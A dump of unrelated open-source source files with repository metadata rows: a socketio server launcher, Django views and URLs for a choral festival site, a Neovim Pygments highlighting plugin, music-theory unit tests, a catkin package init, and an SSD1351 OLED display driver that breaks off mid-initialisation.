| gx1997/chrome-loongson | third_party/webdriver/python/test/selenium/webdriver/firefox/test_ff_api.py | Python | bsd-3-clause | 1,189 | 0.001682 |
from application import app as application
from gevent import monkey
from socketio.server import SocketIOServer
monkey.patch_all()
if __name__ == '__main__':
    # The original `socketio.run(application)` referenced a name that is never
    # imported here (only SocketIOServer is), raising a NameError; use the
    # imported gevent-socketio server directly, as the commented-out code intended.
    SocketIOServer(
        ('', application.config['PORT']),
        application,
        resource="socket.io").serve_forever()
| PhoenixRacing/PhoenixRacingWebApp-noregrets | run_server.py | Python | bsd-3-clause | 327 | 0.003058 |
# browsershots.org - Test your web design in different browsers
# Copyright (C) 2007 Johann C. Rocholl <johann@browsershots.org>
#
# Browsershots is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# Browsershots is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
URL configuration for the accounts app.
"""
__revision__ = "$Rev: 2160 $"
__date__ = "$Date: 2007-09-18 19:12:50 -0400 (Tue, 18 Sep 2007) $"
__author__ = "$Author: johann $"
from django.conf.urls.defaults import patterns
urlpatterns = patterns('shotserver04.accounts.views',
(r'^login/$', 'login'),
(r'^logout/$', 'logout'),
(r'^profile/$', 'profile'),
(r'^email/$', 'email'),
(r'^verify/(?P<hashkey>[0-9a-f]{32})/$', 'verify'),
)
| foligny/browsershots-psycopg2 | shotserver/shotserver04/accounts/urls.py | Python | gpl-3.0 | 1,222 | 0.000818 |
from django.shortcuts import render, redirect, get_object_or_404
from django.core.urlresolvers import reverse
from openiv.settings import *
# Create your views here.
def index(request):
return redirect(reverse('public:event'))
# Comment the above to have an independent home page.
context = {
'imagesource': 'public/images/image-1.jpg',
'activetab': 'home',
'titletext': EVENT_MEDIUM_NAME,
'text1': [
'The ' + EVENT_ANNIVERSARY + ' AIVCF will take place in ' + EVENT_CITY + ' in ' + EVENT_YEAR + '.',
'Out of courtesy to the upcoming festivals (68th in Perth 2017, 69th in Melbourne 2018), we won’t have any news until Melbourne 2018 has begun. Festival details will be revealed in ' + EVENT_PRIOR_YEAR + '.',
],
}
return render(request,'public/index.html', context)
def event(request):
context = {
'imagesource': 'public/images/image-1.jpg',
'activetab': 'event',
'titletext': 'About ' + EVENT_MEDIUM_NAME,
'text1': [
'Intervarsity choral festivals (IVs) have been an annual event since 1950 when the Melbourne University Choral Society travelled to Sydney to present a combined concert with the Sydney University Musical Society. IVs quickly expanded to include other university choirs and are now hosted in many cities across Australia with participation drawing from the wider choral community in Australia and occasionally overseas.',
EVENT_YEAR + ' sees the ' + EVENT_ANNIVERSARY + ' IV, hosted in ' + EVENT_CITY + ' by ' + EVENT_HOSTED_BY + '. Choristers from across the country will be in ' + EVENT_CITY + ' for intensive rehearsals to produce a grand concert.',
'Out of courtesy to the upcoming festivals (' + EVENT_UPCOMING_EVENTS + '), we won’t have any news until ' + EVENT_PRIOR_CITY + ' ' + EVENT_PRIOR_YEAR + ' has begun. Festival details will be revealed in ' + EVENT_PRIOR_YEAR + '.',
ORGANISATION_SHORT_NAME + ' acknowledges that ' + EVENT_SHORT_NAME + ' is being held on the traditional lands of the ' + EVENT_ABORIGINAL_COUNTRY + ' people; we pay respect to the elders of the community and extend our recognition to their descendants.',
],
'titletext2': 'Past ' + EVENT_CITY + ' IVs'
}
return render(request,'public/event.html', context)
def organisation(request):
context = {
'imagesource': 'public/images/image-1.jpg',
'activetab': 'organisation',
'titletext': ORGANISATION_SHORT_NAME,
'text1': [
'The ' + EVENT_ANNIVERSARY + ' Australian Intervarsity Choral Festival is presented by ' + ORGANISATION_SHORT_NAME + ' in ' + EVENT_YEAR + '. The organisation was elected by the members of ' + EVENT_HOSTED_BY + '.',
'We represent the ' + EVENT_CITY + ' contingent of a wider choral community across Australia with combined membership of over a thousand nationally in the Australian Intervarsity Choral Societies Association (AICSA).',
]
}
return render(request,'public/index.html', context)
def participate(request):
context = {
'imagesource': 'public/images/image-2.jpg',
'activetab': 'participate',
'titletext': 'Participate',
}
return render(request,'public/participateindex.html', context)
def participatefundraising(request):
context = {
'imagesource': 'public/images/image-2.jpg',
'activetab': 'participate',
'titletext': 'Participate: Fundraising',
}
return render(request,'public/participatefundraisingindex.html', context)
def help(request):
context = {
'titletext': 'Help',
}
return render(request,'public/help.html', context)
def privacy(request):
context = {
'titletext': 'Privacy policy',
}
return render(request,'public/help.html', context)
def privacyaffiliates(request):
context = {
'titletext': 'Affiliates',
}
return render(request,'public/help.html', context)
def conduct(request):
context = {
'titletext': 'Code of conduct',
}
return render(request,'public/help.html', context)
| amoschou/openiv | public/views.py | Python | mpl-2.0 | 3,942 | 0.011935 |
import neovim
# TODO figure out the python way to do these imports, this is probably wrong
import pygments
import pygments.lexers
import pygments.token
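# NOTE: this plugin targets the legacy `neovim` Python client, whose buffer
# methods accept an `async` keyword argument; `async` became a reserved word
# in Python 3.7, and the successor `pynvim` package spells it `async_`.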
@neovim.plugin
class Neosyntax(object):
def __init__(self, nvim):
self.nvim = nvim
# swap src_ids. from brefdl: allocate two ids, and swap, adding before clearing, so things that don't change won't appear to flicker
self.srcset = True
self.pygmap = {}
t = pygments.token
self.pygmap[t.Comment.Hashbang] = "Comment"
self.pygmap[t.Comment.Single] = "Comment"
self.pygmap[t.Comment] = "Comment" # older versions of pygments don't have Single and Hashbang?
self.pygmap[t.Keyword.Namespace] = "Include"
self.pygmap[t.Keyword] = "Conditional"
self.pygmap[t.Literal.Number.Integer] = "Number"
self.pygmap[t.Literal.String.Double] = "String"
self.pygmap[t.Literal.String.Single] = "String"
self.pygmap[t.Literal.String] = "String" # same comment as above
self.pygmap[t.Name.Builtin.Pseudo] = "Boolean"
self.pygmap[t.Name.Builtin] = "Function"
self.pygmap[t.Name.Decorator] = "PreProc"
self.pygmap[t.Operator.Word] = "Conditional"
def msg(self, m):
self.nvim.command("echom '" + str(m) + "'")
@neovim.autocmd('BufEnter', pattern='*', eval='expand("<abuf>")', sync=False)
def autocmd_handler1(self, bufnr): # TODO how to pass in multiple arguments?
self.highlight_buffer(int(bufnr))
@neovim.autocmd('TextChanged', pattern='*', eval='expand("<abuf>")', sync=False)
def autocmd_handler2(self, bufnr):
self.highlight_buffer(int(bufnr))
@neovim.autocmd('TextChangedI', pattern='*', eval='expand("<abuf>")', sync=False)
def autocmd_handler3(self, bufnr):
# TODO do special thing here if the user is currently typing inside a string or comment
# to extend that highlight group a bunch of columns ahead
# not sure where the best place to implement that will be
# TODO I was hoping that performance with syntax highlighting being done by this autocmd
# would be comparable to plain old :syntax off and without this plugin
# I think it is better, although I'll have to find a way to test that empirically
# But, it still isn't as good as I hoped. Some flickering is still present
# This may be a limitation of the tui and its ability to process remote api calls
# Maybe this will work better in the eventual gui?
# If nothing else, this function gives the option to have syntax highlighting turned off during
# insert mode, then handled once you leave insert mode. Just have to remove the TextChangedI autocmd
# and keep the TextChanged one (no I).
# This is less than ideal for lots of situations, but is better than nothing
# TODO figure out a way to queue these calls somehow? with the swapping src_id strategy,
# flicker is gone when typing fast in insert mode, but typing too fast can still cause a
# call backlog that can either crash the python host or just appear as lots of lag to the user
# a timer? when this is called, start a timer that counts down from X seconds
        # throw away any subsequent calls that come in before the timer is up
# maybe highlight_buffer should take lines as an argument to facilitate the viewport shit?
self.highlight_buffer(int(bufnr))
@neovim.function('UnHighlightBuffer', sync=False)
def unhighlight_buffer(self, bufnr):
bufnr = int(bufnr)
for b in self.nvim.buffers:
if b.number == bufnr: # TODO what if it isn't found?
buf = b
break
end = len([line for line in buf])
buf.clear_highlight(src_id=1, line_start=0, line_end=end, async=True)
buf.clear_highlight(src_id=2, line_start=0, line_end=end, async=True)
@neovim.function('HighlightBuffer', sync=False)
def highlight_buffer(self, bufnr):
# XXX some ideas to help with flickering:
# use cursorholdi instead of textchangedi
# still use textchangedi, but also use a timer, and if the highlight is less than X seconds old, don't recompute, just return
# in insert mode, only recompute highlight groups on the line, or couple of lines surrounding the cursor
# get the viewport of the current window, render that region only or first before the rest of the buffer
# also, should cache a map of buffer -> lexer so this doesn't have to be done every time
for b in self.nvim.buffers:
if b.number == bufnr: # TODO what if it isn't found?
buf = b
break
# TODO - can I be more intelligent than doing the whole buffer every time? just the area around a change?
fullbuf = "\n".join([line for line in buf]) # TODO can i cache this somehow?
self.msg(fullbuf)
mylexer = pygments.lexers.guess_lexer(fullbuf) # TODO cache this
# TODO these numbers need to be per buffer
addid = 1 if self.srcset else 2
rmid = 2 if self.srcset else 1
self.srcset = not self.srcset
arglist = []
linenum = 0
lastnewlineindex = -1
for (index, tokentype, value) in mylexer.get_tokens_unprocessed(fullbuf):
self.msg("line: " + str(linenum))
self.msg("idx : " + str(index))
self.msg("lni : " + str(lastnewlineindex))
self.msg("tok : " + str(tokentype))
self.msg("val : " + str(value))
self.msg("--------")
# XXX issue with highlight groups
# if `:syntax off` is set from vimrc, which is the entire goal of this plugin
# then a lot (maybe all) of the language specific highlight groups will never be loaded
# e.g., the "Comment" highlight group will probably exist (assuming the colorscheme
# defines it), but "pythonComment" will not.
# This isn't great, because I want to maintain the ability of users to modify individual
# language highlight groups if they feel like it
# I am not going to worry about this just yet, but I will need to find a way to address this eventually
# For now, my solution is to just not use those language specific groups while I get the basics working
# Also, it would be really swell if I didn't have to write this code for every single languages someone
# might edit in vim. Actually, that's really the only way to do it.
# I need to make the core functionality as generic as possible, while having an easy way to override settings
# for a specific language if the generic way just won't work in all edge cases
# This should be possible both within this python code, and from vimscript
# entire file is sent to pygments in a single big list, so column indexes are relative to the entire file, not per line
# keep track of the last index where a newline was found
# the index for the 0th column for the next line will be 1 after the lastnewlineindex
# at the same time, also track line numbers
# TODO newlines are their own tokens in python, but not in bash, and probably other languages
# I assume any language where newlines don't have semantic meaning won't have them as tokens
# need to find a better way to keep track of line numbers
# shit.
# so i can either override each lexer that doesn't have newlines as tokens, see here:
# http://pygments.org/docs/lexerdevelopment/#modifying-token-streams
# or, note down the byte index of newlines in the fullbuf stream and work with that
# first method might be marginally faster, but is so ugly it makes me want to cry
# probably will go with second method.
if value == '\n':
linenum += 1
lastnewlineindex = index
# self.msg('found newline')
elif tokentype in self.pygmap:
colstart = index - (lastnewlineindex + 1)
# precompute all the add_highlight calls to be made
arglist.append({'hl_group': self.pygmap[tokentype], 'line': linenum, 'col_start': colstart, 'col_end': colstart+len(value), 'src_id': addid, 'async': True})
# done computing, make the calls
for arg in arglist:
buf.add_highlight(**arg)
# clear old highlighting
buf.clear_highlight(src_id=rmid, line_start=0, line_end=len(fullbuf), async=True)
| jebaum/neosyntax | rplugin/python3/neosyntax.py | Python | gpl-3.0 | 8,728 | 0.007218 |
import unittest
import logging
from harmoniccontext.harmonic_context import HarmonicContext
from harmoniccontext.harmonic_context_track import HarmonicContextTrack
from harmonicmodel.secondary_chord_template import SecondaryChordTemplate
from harmonicmodel.tertian_chord_template import TertianChordTemplate
from structure.LineGrammar.core.line_grammar_executor import LineGrammarExecutor
from structure.line import Line
from structure.note import Note
from timemodel.duration import Duration
from tonalmodel.diatonic_foundation import DiatonicFoundation
from tonalmodel.modality import ModalityType
from tonalmodel.tonality import Tonality
from transformation.reflection.t_chromatic_reflection import TChromaticReflection
from misc.interval import Interval
from tonalmodel.diatonic_pitch import DiatonicPitch
from fractions import Fraction
class TestTChromaticFlip(unittest.TestCase):
logging.basicConfig(level=logging.DEBUG)
def setUp(self):
pass
def tearDown(self):
pass
def test_hct_rebuild_perfect_overlap(self):
print('----- test_hct_rebuild_perfect_overlap -----')
line_str = '{<C-Major: I> hA:5 <:IV> B qC G <:VI> hD}'
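        # Line-grammar sketch: '<C-Major: I>' sets the harmonic context, the
        # h/q/s prefixes appear to encode half/quarter/sixteenth durations,
        # and ':5' an octave (readings inferred from this test, not from the
        # grammar's documentation).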
lge = LineGrammarExecutor()
target_line, target_hct = lge.parse(line_str)
print('--- before transformation ---')
TestTChromaticFlip.print_notes(target_line)
TestTChromaticFlip.print_hct(target_hct)
cue = DiatonicPitch(5, 'c')
f = TChromaticReflection(target_line, target_hct, cue)
temporal_extent = Interval(Fraction(1, 2), Fraction(3, 2))
score_line, score_hct = f.apply(temporal_extent, cue)
print('--- after transformation ---')
TestTChromaticFlip.print_notes(score_line)
TestTChromaticFlip.print_hct(score_hct)
print('--- transformation ---')
TestTChromaticFlip.print_function(f, target_hct)
notes = score_line.get_all_notes()
assert 'Db:4' == str(notes[1].diatonic_pitch)
assert 'C:5' == str(notes[2].diatonic_pitch)
assert 'F:4' == str(notes[3].diatonic_pitch)
hc_list = score_hct.hc_list()
assert len(hc_list) == 3
assert hc_list[1].chord.chord_template.scale_degree == 1
assert {t[0].diatonic_symbol for t in hc_list[1].chord.tones} == {'G', 'C', 'Eb'}
assert hc_list[1].chord.chord_template.inversion == 3
def test_mozart(self):
print('----- Mozart -----')
line_str = '{<C-Major: I> hC:5 qE G <:VMaj7> q@b:4 sC:5 D <:I> hC}'
lge = LineGrammarExecutor()
target_line, target_hct = lge.parse(line_str)
print('--- before transformation ---')
TestTChromaticFlip.print_notes(target_line)
TestTChromaticFlip.print_hct(target_hct)
cue = DiatonicPitch(5, 'c')
f = TChromaticReflection(target_line, target_hct, cue)
score_line, score_hct = f.apply()
print('--- after transformation ---')
TestTChromaticFlip.print_notes(score_line)
TestTChromaticFlip.print_hct(score_hct)
print('--- transformation ---')
TestTChromaticFlip.print_function(f, target_hct)
notes = score_line.get_all_notes()
assert 'C:5' == str(notes[0].diatonic_pitch)
assert 'Ab:4' == str(notes[1].diatonic_pitch)
assert 'F:4' == str(notes[2].diatonic_pitch)
assert 'Db:5' == str(notes[3].diatonic_pitch)
assert 'C:5' == str(notes[4].diatonic_pitch)
assert 'Bb:4' == str(notes[5].diatonic_pitch)
assert 'C:5' == str(notes[6].diatonic_pitch)
hc_list = score_hct.hc_list()
assert len(hc_list) == 3
assert hc_list[0].chord.chord_template.scale_degree == 4
assert {t[0].diatonic_symbol for t in hc_list[0].chord.tones} == {'C', 'F', 'Ab'}
assert hc_list[0].chord.chord_template.inversion == 3
assert hc_list[1].chord.chord_template.scale_degree == 7
assert {t[0].diatonic_symbol for t in hc_list[1].chord.tones} == {'F', 'Bb', 'Db', 'Gb'}
assert hc_list[1].chord.chord_template.inversion == 3
assert hc_list[2].chord.chord_template.scale_degree == 4
assert {t[0].diatonic_symbol for t in hc_list[2].chord.tones} == {'C', 'F', 'Ab'}
assert hc_list[2].chord.chord_template.inversion == 3
def test_secondary_chord(self):
print('----- test_secondary_tonality -----')
diatonic_tonality = Tonality.create(ModalityType.Major, DiatonicFoundation.get_tone("C"))
chort_t_i = TertianChordTemplate.parse('tI')
chord_i = chort_t_i.create_chord(diatonic_tonality)
chord_v_ii = SecondaryChordTemplate.parse('V/ii').create_chord(diatonic_tonality)
chord_vi_v = SecondaryChordTemplate.parse('vi/V').create_chord(diatonic_tonality)
chord_t_ii = TertianChordTemplate.parse('tii')
chord_ii = chord_t_ii.create_chord(diatonic_tonality)
hc_track = HarmonicContextTrack()
hc_track.append(HarmonicContext(diatonic_tonality, chord_i, Duration(1)))
hc_track.append(HarmonicContext(diatonic_tonality, chord_v_ii, Duration(1)))
hc_track.append(HarmonicContext(diatonic_tonality, chord_vi_v, Duration(1)))
hc_track.append(HarmonicContext(diatonic_tonality, chord_ii, Duration(1)))
TestTChromaticFlip.print_hct(hc_track)
tune = [('C:5', (1, 1)), ('E:5', (1, 1)), ('E:5', (1, 1)), ('G:5', (1, 1))]
line = TestTChromaticFlip.build_line(tune)
cue = DiatonicPitch(5, 'd')
tflip = TChromaticReflection(line, hc_track, cue)
temporal_extent = Interval(Fraction(0), Fraction(4))
score_line, score_hct = tflip.apply()
TestTChromaticFlip.print_notes(score_line)
TestTChromaticFlip.print_hct(score_hct)
@staticmethod
def print_hct(hct):
hcs = hct.hc_list()
index = 0
for hc in hcs:
print('[{0}] {1} {2}'.format(index, hc, hc.position))
index += 1
print("--------")
@staticmethod
def print_notes(line):
for note in line.get_all_notes():
print(note)
print("--------")
@staticmethod
def print_map(f, source_hct, cue):
for hc in source_hct.hc_list():
if hc in f.hc_flip_map:
pitch_map = f.hc_flip_map[hc]
map_list = list()
for tone in pitch_map.domain_tonality.annotation[:-1]:
ft = pitch_map.tonal_function[tone]
map_list.append('{0}-->{1}'.format(tone.diatonic_symbol, ft.diatonic_symbol))
print('[{0}] ({1}) {2}'.format(hc, pitch_map.range_tonality, ', '.join([s for s in map_list])))
@staticmethod
def print_function(f, source_hct):
for hc in source_hct.hc_list():
if hc in f.hc_flip_map:
pitch_map = f.hc_flip_map[hc]
domain = sorted([p for p in pitch_map.domain], key=lambda p: p.chromatic_distance)
domain_tones = pitch_map.domain_tonality.annotation[:-1]
map_list = list()
for p in domain:
r = pitch_map[p]
if p.diatonic_tone in domain_tones:
map_list.append('{0} --> {1}'.format(p, r))
print('[{0}] ({1}) {2}: {3}'.format(pitch_map.domain_tonality,
pitch_map.cue_pitch,
pitch_map.range_tonality,
', '.join([s for s in map_list])
)
)
@staticmethod
def build_line(note_spec_list):
note_list = list()
for spec in note_spec_list:
pitch = DiatonicPitch.parse(spec[0])
n = Note(pitch, Duration(spec[1][0], spec[1][1]))
note_list.append(n)
return Line(note_list)
| dpazel/music_rep | tests/transformation_tests/reflection_tests/test_t_chromatic_reflection.py | Python | mit | 7,963 | 0.003014 |
# generated from catkin/cmake/template/__init__.py.in
# keep symbol table as clean as possible by deleting all unnecessary symbols
from os import path as os_path
from sys import path as sys_path
from pkgutil import extend_path
__extended_path = "/home/rss-student/rss-2014-team-3/src/robotbrain/src".split(";")
for p in reversed(__extended_path):
sys_path.insert(0, p)
del p
del sys_path
__path__ = extend_path(__path__, __name__)
del extend_path
__execfiles = []
for p in __extended_path:
src_init_file = os_path.join(p, __name__ + '.py')
if os_path.isfile(src_init_file):
__execfiles.append(src_init_file)
else:
src_init_file = os_path.join(p, __name__, '__init__.py')
if os_path.isfile(src_init_file):
__execfiles.append(src_init_file)
del src_init_file
del p
del os_path
del __extended_path
for __execfile in __execfiles:
with open(__execfile, 'r') as __fh:
exec(__fh.read())
del __fh
del __execfile
del __execfiles
| WeirdCoder/rss-2014-team-3 | devel/lib/python2.7/dist-packages/robotbrain/__init__.py | Python | mit | 1,010 | 0.00099 |
# Copyright (c) 2014 Adafruit Industries
# Author: Tony DiCola
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import logging
import time
import Adafruit_GPIO as GPIO
import Adafruit_GPIO.SPI as SPI
# Constants
SSD1351_I2C_ADDRESS = 0x3C # 011110+SA0+RW - 0x3C or 0x3D
SSD1351_SETCONTRAST = 0x81
SSD1351_DISPLAYALLON_RESUME = 0xA4
SSD1351_DISPLAYALLON = 0xA5
SSD1351_NORMALDISPLAY = 0xA6
SSD1351_INVERTDISPLAY = 0xA7
SSD1351_DISPLAYOFF = 0xAE
SSD1351_DISPLAYON = 0xAF
SSD1351_SETDISPLAYOFFSET = 0xD3
SSD1351_SETCOMPINS = 0xDA
SSD1351_SETVCOMDETECT = 0xDB
SSD1351_SETDISPLAYCLOCKDIV = 0xD5
SSD1351_SETPRECHARGE = 0xD9
SSD1351_SETMULTIPLEX = 0xA8
SSD1351_SETLOWCOLUMN = 0x00
SSD1351_SETHIGHCOLUMN = 0x10
SSD1351_SETSTARTLINE = 0x40
SSD1351_MEMORYMODE = 0x20
SSD1351_COLUMNADDR = 0x21
SSD1351_PAGEADDR = 0x22
SSD1351_COMSCANINC = 0xC0
SSD1351_COMSCANDEC = 0xC8
SSD1351_SEGREMAP = 0xA0
SSD1351_CHARGEPUMP = 0x8D
SSD1351_EXTERNALVCC = 0x1
SSD1351_SWITCHCAPVCC = 0x2
# Scrolling constants
SSD1351_ACTIVATE_SCROLL = 0x2F
SSD1351_DEACTIVATE_SCROLL = 0x2E
SSD1351_SET_VERTICAL_SCROLL_AREA = 0xA3
SSD1351_RIGHT_HORIZONTAL_SCROLL = 0x26
SSD1351_LEFT_HORIZONTAL_SCROLL = 0x27
SSD1351_VERTICAL_AND_RIGHT_HORIZONTAL_SCROLL = 0x29
SSD1351_VERTICAL_AND_LEFT_HORIZONTAL_SCROLL = 0x2A
#? SSD1351_DELAYS_HWFILL (3)
#? SSD1351_DELAYS_HWLINE (1)
# SSD1351 Commands
SSD1351_SETCOLUMN = 0x15
SSD1351_SETROW = 0x75
SSD1351_WRITERAM = 0x5C
SSD1351_READRAM = 0x5D
SSD1351_SETREMAP = 0xA0
SSD1351_STARTLINE = 0xA1
SSD1351_DISPLAYOFFSET = 0xA2
SSD1351_DISPLAYALLOFF = 0xA4
SSD1351_DISPLAYALLON = 0xA5
SSD1351_NORMALDISPLAY = 0xA6
SSD1351_INVERTDISPLAY = 0xA7
SSD1351_FUNCTIONSELECT = 0xAB
SSD1351_DISPLAYOFF = 0xAE
SSD1351_DISPLAYON = 0xAF
SSD1351_PRECHARGE = 0xB1
SSD1351_DISPLAYENHANCE = 0xB2
SSD1351_CLOCKDIV = 0xB3
SSD1351_SETVSL = 0xB4
SSD1351_SETGPIO = 0xB5
SSD1351_PRECHARGE2 = 0xB6
SSD1351_SETGRAY = 0xB8
SSD1351_USELUT = 0xB9
SSD1351_PRECHARGELEVEL = 0xBB
SSD1351_VCOMH = 0xBE
SSD1351_CONTRASTABC = 0xC1
SSD1351_CONTRASTMASTER = 0xC7
SSD1351_MUXRATIO = 0xCA
SSD1351_COMMANDLOCK = 0xFD
SSD1351_HORIZSCROLL = 0x96
SSD1351_STOPSCROLL = 0x9E
SSD1351_STARTSCROLL = 0x9F
class SSD1351Base(object):
"""Base class for SSD1351-based OLED displays. Implementors should subclass
and provide an implementation for the _initialize function.
"""
def __init__(self, width, height, rst, dc=None, sclk=None, din=None, cs=None,
gpio=None, spi=None, i2c_bus=None, i2c_address=SSD1351_I2C_ADDRESS,
i2c=None):
self._log = logging.getLogger('Adafruit_SSD1351.SSD1351Base')
self._spi = None
self._i2c = None
self.width = width
self.height = height
        self._pages = height // 8  # integer page count (plain / would give a float on Python 3)
self._buffer = [0]*(width*height)
# Default to platform GPIO if not provided.
self._gpio = gpio
if self._gpio is None:
self._gpio = GPIO.get_platform_gpio()
# Setup reset pin.
self._rst = rst
self._gpio.setup(self._rst, GPIO.OUT)
# Handle hardware SPI
if spi is not None:
self._log.debug('Using hardware SPI')
self._spi = spi
self._spi.set_clock_hz(8000000)
# Handle software SPI
elif sclk is not None and din is not None and cs is not None:
self._log.debug('Using software SPI')
self._spi = SPI.BitBang(self._gpio, sclk, din, None, cs)
# Handle hardware I2C
elif i2c is not None:
self._log.debug('Using hardware I2C with custom I2C provider.')
self._i2c = i2c.get_i2c_device(i2c_address)
else:
self._log.debug('Using hardware I2C with platform I2C provider.')
import Adafruit_GPIO.I2C as I2C
if i2c_bus is None:
self._i2c = I2C.get_i2c_device(i2c_address)
else:
self._i2c = I2C.get_i2c_device(i2c_address, busnum=i2c_bus)
# Initialize DC pin if using SPI.
if self._spi is not None:
if dc is None:
raise ValueError('DC pin must be provided when using SPI.')
self._dc = dc
self._gpio.setup(self._dc, GPIO.OUT)
def _initialize(self):
raise NotImplementedError
def command(self, c):
"""Send command byte to display."""
if self._spi is not None:
# SPI write.
self._gpio.set_low(self._dc)
self._spi.write([c])
else:
# I2C write.
control = 0x00 # Co = 0, DC = 0
self._i2c.write8(control, c)
def data(self, c):
"""Send byte of data to display."""
if self._spi is not None:
# SPI write.
self._gpio.set_high(self._dc)
self._spi.write([c])
else:
# I2C write.
            control = 0x40  # Co = 0, D/C# = 1 (data byte)
self._i2c.write8(control, c)
def begin(self, vccstate=SSD1351_SWITCHCAPVCC):
"""Initialize display."""
# Save vcc state.
self._vccstate = vccstate
# Reset and initialize display.
self.reset()
self._initialize()
# Turn on the display.
self.command(SSD1351_DISPLAYON)
def reset(self):
"""Reset the display."""
# Set reset high for a millisecond.
self._gpio.set_high(self._rst)
time.sleep(0.001)
# Set reset low for 10 milliseconds.
self._gpio.set_low(self._rst)
time.sleep(0.010)
# Set reset high again.
self._gpio.set_high(self._rst)
def display(self):
"""Write display buffer to physical display."""
self.command(SSD1351_SETCOLUMN)
self.data(0) # Column start address. (0 = reset)
self.data(self.width-1) # Column end address.
self.command(SSD1351_SETROW)
self.data(0) # Page start address. (0 = reset)
self.data(self.height-1) # Page end address.
# Write buffer data.
if self._spi is not None:
# Set DC high for data.
self._gpio.set_high(self._dc)
# Write buffer.
self.command(SSD1351_WRITERAM)
self._spi.write(self._buffer)
else:
for i in range(0, len(self._buffer), 16):
                control = 0x40  # Co = 0, D/C# = 1 (data bytes)
self._i2c.writeList(control, self._buffer[i:i+16])
def image(self, image):
"""Set buffer to value of Python Imaging Library image. The image should
be in 1 bit mode and a size equal to the display size.
"""
# if image.mode != '1':
# raise ValueError('Image must be in mode 1.')
imwidth, imheight = image.size
if imwidth != self.width or imheight != self.height:
raise ValueError('Image must be same dimensions as display ({0}x{1}).' \
.format(self.width, self.height))
# Grab all the pixels from the image, faster than getpixel.
pix = image.load()
# Iterate through the memory pages
index = 0
        for page in range(self._pages):  # height/8 packed pages, not raw rows
# Iterate through all x axis columns.
for x in range(self.width):
# Set the bits for the column of pixels at the current position.
bits = 0
# Don't use range here as it's a bit slow
for bit in [0, 1, 2, 3, 4, 5, 6, 7]:
bits = bits << 1
bits |= 0 if pix[(x, page*8+7-bit)] == 0 else 1
# Update buffer byte and increment to next byte.
self._buffer[index] = bits
index += 1
def clear(self):
"""Clear contents of image buffer."""
self._buffer = [0]*(self.width*self.height)
def set_contrast(self, contrast):
"""Sets the contrast of the display. Contrast should be a value between
0 and 255."""
if contrast < 0 or contrast > 255:
raise ValueError('Contrast must be a value from 0 to 255 (inclusive).')
self.command(SSD1351_CONTRASTMASTER)
        self.data(contrast)  # the contrast value is a data byte (cf. _initialize)
def dim(self, dim):
"""Adjusts contrast to dim the display if dim is True, otherwise sets the
contrast to normal brightness if dim is False.
"""
# Assume dim display.
contrast = 0
# Adjust contrast based on VCC if not dimming.
        if not dim:
            if self._vccstate == SSD1351_EXTERNALVCC:
                contrast = 0x9F
            else:
                contrast = 0xCF
        # Apply the new contrast setting.
        self.set_contrast(contrast)
    def invert(self):
        """Invert the display colors."""
        self.command(SSD1351_INVERTDISPLAY)
def rawfill(self, x, y, w, h, fillcolor):
if (x >= self.width) or (y >= self.height):
return
        if y + h > self.height:
            h = self.height - y
        if x + w > self.width:
            w = self.width - x
self.command(SSD1351_SETCOLUMN)
self.data(x)
self.data(x+w-1)
self.command(SSD1351_SETROW)
self.data(y)
self.data(y+h-1)
#fill!
self.command(SSD1351_WRITERAM)
        for num in range(0, w * h):
self.data(fillcolor >> 8)
self.data(fillcolor)
def color565(self, r, g, b):
c = r >> 3
c <<= 6
c |= g >> 2
c <<= 5
c |= b >> 3
return c
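    # A quick sanity check of the 5-6-5 packing above (illustrative comment,
    # not part of the original driver): color565(255, 0, 0) -> 0xF800 (red),
    # color565(0, 255, 0) -> 0x07E0 (green), color565(0, 0, 255) -> 0x001F (blue).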
def roughimage(self, image):
self.command(SSD1351_SETCOLUMN)
self.data(0)
self.data(self.width - 1)
self.command(SSD1351_SETROW)
self.data(0)
self.data(self.height-1)
#fill
im_width, im_height = image.size
print(im_width, im_height)
rgb_image = image.convert('RGB')
pix = rgb_image.load()
self.command(SSD1351_WRITERAM)
for row in range (0, im_height):
for column in range (0, im_width):
r,g,b = pix[column, row]
color = self.color565(r,g,b)
self.data( color >> 8)
self.data( color )
class SSD1351_128_96(SSD1351Base):
def __init__(self, rst, dc=None, sclk=None, din=None, cs=None, gpio=None,
spi=None, i2c_bus=None, i2c_address=SSD1351_I2C_ADDRESS,
i2c=None):
# Call base class constructor.
super(SSD1351_128_96, self).__init__(128, 96, rst, dc, sclk, din, cs,
gpio, spi, i2c_bus, i2c_address, i2c)
def _initialize(self):
# 128x96 pixel specific initialization.
# My version
self.command(SSD1351_COMMANDLOCK) # set command lock
self.data(0x12)
self.command(SSD1351_COMMANDLOCK) # set command lock
self.data(0xB1)
self.command(SSD1351_DISPLAYOFF) # 0xAE
self.command(SSD1351_CLOCKDIV) # 0xB3
self.command(0xF1) # 7:4 = Oscillator Frequency, 3:0 = CLK Div Ratio (A[3:0]+1 = 1..16)
self.command(SSD1351_MUXRATIO)
self.data(127)
self.command(SSD1351_SETREMAP)
self.data(0x74)
self.command(SSD1351_SETCOLUMN)
self.data(0x00)
self.data(0x7F)
self.command(SSD1351_SETROW)
self.data(0x00)
self.data(0x7F)
self.command(SSD1351_STARTLINE) # 0xA1
self.data(96)
